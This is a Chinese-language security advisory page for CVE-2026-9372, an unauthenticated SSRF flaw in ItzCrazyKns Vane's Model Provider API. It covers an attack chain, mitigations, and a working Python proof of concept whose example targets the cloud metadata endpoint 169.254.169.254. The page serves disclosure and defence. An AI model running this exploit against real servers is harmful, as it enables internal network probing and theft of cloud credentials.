IPBUF安全漏洞报告
English
CVE-2026-9372 CVSS 7.3 高危

CVE-2026-9372 ItzCrazyKns Vane Model Provider API SSRF漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9372
漏洞类型
服务端请求伪造(SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ItzCrazyKns Vane

相关标签

SSRF服务端请求伪造ItzCrazyKns VaneCVE-2026-9372API安全高危漏洞无需认证远程利用

漏洞概述

CVE-2026-9372是ItzCrazyKns Vane项目中的一个高危服务端请求伪造(SSRF)漏洞。该漏洞存在于src/app/api/providers/route.ts文件中的Model Provider API组件,影响版本至1.12.1。攻击者可以通过构造恶意的baseURL参数值,诱导服务器向任意指定的目标地址发起请求,从而实现对内网资源的未授权访问、端口扫描、读取敏感文件或服务等攻击。由于该漏洞无需认证即可利用,且已有公开的漏洞利用代码,因此存在较高的安全风险。项目维护方在收到漏洞报告后尚未做出响应,用户需采取临时防护措施或等待官方修复。

技术细节

该漏洞存在于ItzCrazyKns Vane的Model Provider API端点中,具体位置在src/app/api/providers/route.ts文件。漏洞根源在于该API对用户提供的baseURL参数缺乏充分的验证和过滤。攻击者可以通过发送精心构造的HTTP请求,将baseURL参数指向内部网络地址(如127.0.0.1、192.168.x.x等)、云元数据端点(如AWS 169.254.169.254)或其他敏感服务。服务器在处理请求时会使用该baseURL发起后续HTTP请求,从而实现服务端请求伪造。攻击者可能利用此漏洞探测内网拓扑结构、读取云环境凭证、访问内部管理接口或对内部服务进行未授权操作。CVSS 3.1评分7.3(高危),攻击复杂度低,无需认证和用户交互,影响机密性、完整性和可用性均为低级别。

攻击链分析

STEP 1
步骤1
攻击者识别目标站点使用ItzCrazyKns Vane 1.12.1或更早版本
STEP 2
步骤2
访问/api/providers端点,该端点用于配置模型提供商的baseURL
STEP 3
步骤3
构造恶意baseURL参数,指向内部网络地址、云元数据端点或其他敏感资源
STEP 4
步骤4
服务器接收请求后,使用攻击者指定的baseURL发起HTTP请求
STEP 5
步骤5
攻击者通过响应内容获取内网资源信息,如服务指纹、敏感数据或云凭证
STEP 6
步骤6
利用获取的信息进行进一步攻击,如横向移动、权限提升或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2026-9372 SSRF PoC for ItzCrazyKns Vane # Target: Model Provider API endpoint def exploit_ssrf(target_url, ssrf_target): """ Exploit SSRF vulnerability by manipulating baseURL parameter Args: target_url: Base URL of vulnerable Vane instance ssrf_target: Internal resource to target (e.g., http://127.0.0.1:22) """ endpoint = f"{target_url.rstrip('/')}/api/providers" payload = { 'baseURL': ssrf_target, 'model': 'test', 'apiKey': 'test' } try: response = requests.post(endpoint, json=payload, timeout=10) print(f"[*] Request sent to: {endpoint}") print(f"[*] SSRF Target: {ssrf_target}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-9372.py <target_url> <ssrf_target>") print("Example: python cve-2026-9372.py http://vulnerable-host:3000 http://169.254.169.254/latest/meta-data/") sys.exit(1) target = sys.argv[1] ssrf = sys.argv[2] exploit_ssrf(target, ssrf)

影响范围

ItzCrazyKns Vane <= 1.12.1

防御指南

临时缓解措施
在官方修复发布前,可采取以下临时缓解措施:1)禁用或限制/api/providers端点的访问权限;2)配置网络防火墙规则,阻止服务器对内网地址(10.0.0.0/8、172.16.0.0/12、192.168.0.0/16、127.0.0.0/8)及云元数据端点(169.254.169.254等)的出站连接;3)启用请求日志监控,及时发现异常的baseURL参数请求;4)考虑使用云服务商的安全组或网络安全组限制出站流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表